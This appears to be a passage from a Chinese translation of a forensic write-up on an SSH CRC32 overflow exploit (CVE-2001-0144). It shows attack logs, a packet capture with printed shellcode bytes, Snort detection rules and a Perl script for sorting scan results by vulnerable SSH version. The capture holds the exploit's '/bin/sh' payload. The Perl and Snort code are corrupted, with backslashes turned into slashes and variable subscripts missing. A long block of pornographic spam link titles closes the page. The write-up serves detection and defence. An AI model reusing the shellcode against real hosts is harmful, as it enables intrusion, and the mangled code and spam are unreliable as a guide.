Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399

Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

注重日志條目的最后一條,假如成功利用此漏洞被入侵,認證過程就會停止,因為
此時SHELLCODE的后門程序已經執行,這樣你可以連接端口進行任何操作。唯一的
問題是,SSH守護程序(至少SSH.com 1.2.31)會由于認證過程不完整而超時,導致
關閉開啟的SHELL。一般在監聽shell的父進程關閉只前會有10分鐘時間空域。

網絡通信信息分析
=====================

在這里使用了Tcpdump來截獲上面的攻擊行為,記錄信息在sshdx.dump,可以被用
來IDS入侵檢測系統獲得攻擊標志信息。假如你的IDS系統不支持tcpdump文件,你
可以使用"tcpreplay"[12]來轉換tcpdump信息。

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這樣可以很輕易的查看SSH守護程序產生的多個連接信息,使用"ngrep"[5]工具可以
辨認出最后連接和插入SHELLCODE的暴力破解攻擊信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . .


T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
  SSH-1.5-1.2.31.


T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
  SSH-1.5-OpenSSH_2.2.0p1.


T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
  ............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
  ..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#......./.j
  W...O$....6.......$...V..;...U.@Y.K2.p</..o..?..l.........*.p.K<s..,..
  .@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.


T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
  ............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
  T.....|c...#W./wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
  ....Q/.......8..


T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
  .........4..


T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
  ..W...2.......2.......2.......2.......2.......2.......2.......2.......
  2.......2.......2.......2.......2.......2.......2.......2.......2 ....
  ..2!......2$......2%......2(......2)......2,......2-......20......21..
  ....24......25......28......29......2<......2=......2@......2A......2D
  ......2E......2H......2I......2L......2M......2P......2Q......2T......
  2U......2X......2Y......2/......2]......2`......2a......2d......2e....
  ..2h......2i......2l......2m......2p......2q......2t......2u......2x..
  ....2y......2|......2}......2.......2.......2.......2.......2.......2.
  ......2.......2.......2.......2.......2.......2.......2.......2.......
  2.......2.......2.......2.......2.......2.......2.......2.......2.....

  ..2.......2.......2.......2.......2.......2.......2.......2.......2...
  ....2.......2.......2.......2.......2.......2.......2.......2.......2.
  ......2.......2.......2.......2.......2.......2.......2.......2.......
  2.......2.......2.......2.......2.......2.......2.......2.......2.....
  ..2.......2.......2.......2.......2.......2.......3.......3.......3...
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
  ......3.......3.......3.......3.......3 ......3!......3$......3%......
  3(......3)......3,......3-......30......31......34......35......38....
  ..39......3<......3=......3@......3A......3D......3E......3H......3I..
  ....3L......3M......3P......3Q......3T......3U......3X......3Y......3/
  ......3]......3`......3a......3d........1...p}.@


T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
  ......3i......3l......3m......3p......3q......3t......3u......3x......
  3y......3|......3}......3.......3.......3.......3.......3.......3.....
  ..3.......3.......3.......3.......3.......3.......3.......3.......3...
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
  ......3.......3.......3.......3.......3.......3.......3.......3.......
  3.......3.......3.......3.......3.......3.......3.......3.......3.....
  ..3.......3.......3.......3.......3.......3.......3.......3.......3...
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
  ......3.......3.......3.......3.......3.......4.......4.......4.......
  4.......4.......4.......4.......4.......4.......4.......4.......4.....
  ..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
  ....4)......4,......4-......40......41......44......45......48......49
  ......4<......4=......4@......4A......4D......4E......4H......4I......
  4L......4M......4P......4Q......4T......4U......4X......4Y......4/....
  ..4]......4`......4a......4d......4e......4h......4i......4l......4m..
  ....4p......4q......4t......4u......4x......4y......4|......4}......4.
  ......4.......4.......4.......4.......4.......4.......4.......4.......
  4.......4.......4.......4.......4.......4.......4.......4.......4.....
  ..4.......4.......4.......4.......4.......4.......4.......4.......4...
  ....4.......4.......4.......4.......4.......4.......4.......4.......4.
  ......4.......4.......4.......4.........1...p}.@


. . .


T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................

  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  .....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
  .E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
  ./bin/sh.h0h0h0, 7350, zip/TESO!......................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這樣針對這個攻擊程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。

下面的特征字符串由Marty Roesch 和 Brian Caswell開發并可使用在Snort v1.8 或者
更高的版本[6]:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 /
  (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; /
  flags:A+; content:"/bin/sh"; /
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; /
  classtype:shellcode-detect;)


alert tcp $EXTERNAL_NET any -> $HOME_NET 22 /
  (msg:"EXPLOIT ssh CRC32 overflow filler"; /
  flags:A+; content:"|00 00 00 00 00 00 00 00 00 00 00 00 00|"; /
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; /
  classtype:shellcode-detect;)


alert tcp $EXTERNAL_NET any -> $HOME_NET 22 /
  (msg:"EXPLOIT ssh CRC32 overflow NOOP"; /
  flags:A+; content:"|90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90|"; /
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; /
  classtype:shellcode-detect;)


alert tcp $EXTERNAL_NET any -> $HOME_NET 22 /
  (msg:"EXPLOIT ssh CRC32 overflow"; /
  flags:A+; content:"|00 01 57 00 00 00 18|"; offset:0; depth:7; /
  content:"|FF FF FF FF 00 00|"; offset:8; depth:14; /
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; /
  classtype:shellcode-detect;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

鑒別你的主機是否存在此漏洞
===========================


你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9]
寫的腳本來鑒別SSH服務和它們的版本。

Russell Fulton 也公布了一個腳本程序Argus[10]用來處理日志,包含在下面的附錄中。

----------------------------------------------------------------------------

參考

========

[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
  http://www.all.net/ForensiX/plac.html


[2] Netcat, by der Hobbit
  http://www.l0pht.com/~weld/netcat/


[3] Reverse Engineer's Query Tool
  http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz


[4] LiSt Open Files (lsof)
  http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz


[5] ngrep, by Jordan Ritter
  http://www.packetfactory.net/projects/ngrep/


[6] Snort
  http://www.snort.org/


[7] 7350.org / 7350
  http://www.7350.org/
  http://www.team-teso.org/about.php (see the bottom)


[8] Jeremy Mates 提供的ssh_scan.pl
  http://sial.org/code/perl/scripts/ssh_scan.pl.html


[9] Niels Provos提供的ScanSSH 掃描程序
  http://www.monkey.org/~provos/scanssh/


[10] Argus - 網絡傳輸審核工具
  http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1


[11] tcpdump
  http://staff.washington.edu/dittrich/misc/sshdx.dump


[12] tcpreplay
  http://packages.debian.org/testing/net/tcpreplay.html



Appendix A
==========


兩個掃描腳本如下

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script Operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
# SSH-1.5-1.2.31 (affected)
# beavertail.dept.foo.edu(10.0.0.1)
# lumpysoup.dept.foo.edu(10.0.0.2)
# junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
# hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"

# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is oBTained, or if new
# versions of the SSH server are found on your network.


%affected = (
'Unknown', 'unknown',
'SSH-1.4-1.2.14', 'not affected',
'SSH-1.4-1.2.15', 'not affected',
'SSH-1.4-1.2.16', 'not affected',
'SSH-1.5-1.2.17', 'not affected',
'SSH-1.5-1.2.18', 'not affected',
'SSH-1.5-1.2.19', 'not affected',
'SSH-1.5-1.2.20', 'not affected',
'SSH-1.5-1.2.21', 'not affected',
'SSH-1.5-1.2.22', 'not affected',
'SSH-1.5-1.2.23', 'not affected',
'SSH-1.5-1.2.24', 'affected',
'SSH-1.5-1.2.25', 'affected',
'SSH-1.5-1.2.26', 'affected',
'SSH-1.5-1.2.27', 'affected',
'SSH-1.5-1.2.28', 'affected',
'SSH-1.5-1.2.29', 'affected',
'SSH-1.5-1.2.30', 'affected',
'SSH-1.5-1.2.31', 'affected',
'SSH-1.5-1.2.31a', 'not affected',
'SSH-1.5-1.2.32', 'not affected',
'SSH-1.5-1.3.7', 'not affected',
'SSH-1.5-Cisco-1.25', 'unknown',
'SSH-1.5-OSU_1.5alpha1', 'unknown',
'SSH-1.5-OpenSSH-1.2', 'affected',
'SSH-1.5-OpenSSH-1.2.1', 'affected',
'SSH-1.5-OpenSSH-1.2.2', 'affected',
'SSH-1.5-OpenSSH-1.2.3', 'affected',
'SSH-1.5-OpenSSH_2.5.1', 'not affected',
'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p2', 'not affected',
'SSH-1.5-RemotelyAnywhere', 'not affected',
'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',

'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',
'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',
'SSH-1.99-OpenSSH-2.1', 'affected',
'SSH-1.99-OpenSSH_2.1.1', 'affected',
'SSH-1.99-OpenSSH_2.2.0', 'affected',
'SSH-1.99-OpenSSH_2.2.0p1', 'affected',
'SSH-1.99-OpenSSH_2.3.0', 'not affected',
'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',
'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',
'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',
'SSH-1.99-OpenSSH_2.9', 'not affected',
'SSH-1.99-OpenSSH_2.9p1', 'not affected',
'SSH-1.99-OpenSSH_2.9p2', 'not affected',
'SSH-1.99-OpenSSH_3.0p1', 'not affected',
'SSH-2.0-1.1.1', 'unknown',
'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',
'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',
'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',
'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',
'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',
'SSH-2.0-OpenSSH_2.9p2', 'not affected',
);


# Make SURE you read the code first.
&IKnowWhatImDoing();


$all++, shift(@ARGV) if $ARGV[0] eq "-a";


while (<>) {
  chop;
  s//s+/ /g;
  ($ip, $host, $version) = split(' ', $_);


  # Adjust this to identify other strings reported
  # by servers that have access restrictions, etc.
  # in place and do not show a specific version number.
  # They all fall under the category "Unknown" in this case.
  $version = "Unknown"
  if ($version eq "Couldn't" ||
  $version eq "Unknown" ||
  $version eq "You" ||
  $version eq "timeout");


  $server = $host;
}


foreach $i (sort keys %server) {
  ($version,$ip) = split(":", $i);
  next if ($affected eq "not affected" && ! $all);
  printf("/n/n%s (%s)/n", $version, $affected)
  if ($curver ne $version);
  $curver = $version;
  print " " . $server . "($ip)/n";
}


exit(0);


sub IKnowWhatImDoing {
  local $IKnowWhatImDoing = 0;


  # Uncomment the following line to make this script work.
  # $IKnowWhatImDoing++;
  die "I told you to read the code first, didn't I?/n"
  unless $IKnowWhatImDoing;
  return;
}
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
国产91精品久久久久久| 国产区精品视频| 日本不卡视频在线播放| 日韩最新免费不卡| 久久99久久99精品免观看粉嫩| 国产精品久久久久久久久男| 亚洲欧美视频在线| 日韩精品免费在线观看| 亚洲精品综合久久中文字幕| 日韩av网站大全| 97国产精品视频| 成人h视频在线观看播放| 91精品国产高清久久久久久久久| 国产精品美女呻吟| 法国裸体一区二区| 中文字幕一区日韩电影| 欧美一级片免费在线| 欧美日韩国产中文精品字幕自在自线| 中文字幕综合一区| 欧美电影《睫毛膏》| 91精品视频专区| 91久久久亚洲精品| 国产偷亚洲偷欧美偷精品| 欧美日韩国产综合视频在线观看中文| 亚洲乱码国产乱码精品精天堂| 欧美极品美女电影一区| 欧美做受高潮电影o| 日韩成人xxxx| 欧美激情按摩在线| 久久久久久久久久国产精品| 亚洲性猛交xxxxwww| 97在线看免费观看视频在线观看| 国产视频欧美视频| 日本电影亚洲天堂| 成人免费高清完整版在线观看| 91豆花精品一区| 日韩禁在线播放| 欧美性猛交xxxx免费看漫画| 欧美日韩国产精品| 日韩有码在线播放| 福利视频第一区| 欧美日韩激情视频8区| 欧美日韩国产中文精品字幕自在自线| 尤物九九久久国产精品的分类| 在线日韩日本国产亚洲| 欧美亚洲伦理www| 91手机视频在线观看| 欧美在线视频网站| 8x海外华人永久免费日韩内陆视频| 日韩欧美精品免费在线| 5278欧美一区二区三区| 日韩中文理论片| 92福利视频午夜1000合集在线观看| 91精品国产自产91精品| 黑人巨大精品欧美一区二区免费| 国产亚洲视频在线观看| 91av视频在线免费观看| 久久99热精品这里久久精品| 日韩在线精品视频| 高清一区二区三区四区五区| 欧美又大粗又爽又黄大片视频| 日韩中文字幕精品视频| 伊人男人综合视频网| 久久久久久久久亚洲| 中文字幕日韩欧美精品在线观看| 亚洲激情电影中文字幕| 国产亚洲精品美女久久久| 中文字幕av一区二区三区谷原希美| 国产美女精品视频免费观看| 国产精品久久久久久婷婷天堂| 亚洲一区二区三区乱码aⅴ| 亚洲国产精品网站| 欧美一乱一性一交一视频| 色阁综合伊人av| 日韩av电影免费观看高清| 日韩欧美一区视频| 亚洲第一福利视频| 91色在线观看| 欧美精品18videos性欧| 久久99精品久久久久久噜噜| 日韩中文字幕不卡视频| 欧美高清视频在线观看| 日韩电影在线观看永久视频免费网站| 日韩电影免费观看在线| 国产亚洲精品美女久久久| 久久久综合免费视频| 中文字幕九色91在线| 日韩免费av在线| 国产裸体写真av一区二区| 日韩国产精品亚洲а∨天堂免| 国产精品69久久| 日韩精品在线影院| 欧美精品在线极品| 国产精品99导航| 欧美色另类天堂2015| 4438全国亚洲精品在线观看视频| 欧美视频第一页| 色偷偷av一区二区三区| 成人a级免费视频| 亚洲精品一区二区三区婷婷月| 亚洲国产精品久久久| 国产一区欧美二区三区| 欧美激情视频网| 久久综合伊人77777尤物| 国产精品精品视频| 91欧美视频网站| 国产亚洲福利一区| 91超碰caoporn97人人| 国产视频精品一区二区三区| 亚洲人线精品午夜| 久久福利视频导航| 欧美小视频在线观看| 国产亚洲欧美日韩美女| 国产色视频一区| 国产欧美va欧美va香蕉在| 国产精品久久久久影院日本| 国产亚洲精品久久久久久| 国产女精品视频网站免费| 国产精品欧美风情| 久久精品国产一区二区电影| 一区二区av在线| 高清欧美一区二区三区| 美女福利精品视频| 亚洲欧美精品中文字幕在线| 日韩av在线电影网| 成人中文字幕+乱码+中文字幕| 亚洲精品日韩激情在线电影| 国产精品久久一区| 亚洲一区中文字幕在线观看| 中文字幕视频一区二区在线有码| 精品国产成人在线| 中文字幕日韩高清| 97香蕉超级碰碰久久免费的优势| 国内精品久久久久久久| 精品国产999| 国产精品第3页| 欧洲一区二区视频| 欧美激情18p| 97国产精品人人爽人人做| 国产亚洲精品一区二区| 国产国产精品人在线视| 日本成熟性欧美| 亚洲精品视频播放| 日韩在线中文视频| 人人澡人人澡人人看欧美| 欧美亚洲一区在线| 6080yy精品一区二区三区| 日韩亚洲在线观看| 亚洲国产美女久久久久| 亚洲精品一区中文字幕乱码| 尤物九九久久国产精品的分类| 97视频在线观看免费| 国产精品白嫩初高中害羞小美女| 2019国产精品自在线拍国产不卡| 国产精品欧美日韩| 久久亚洲一区二区三区四区五区高| 日韩高清有码在线| 国产中文字幕日韩| 亚洲福利视频专区| 亚洲欧美日韩天堂一区二区| 清纯唯美亚洲激情| 综合国产在线视频| 亚洲第一精品电影| 亚洲国产精品大全|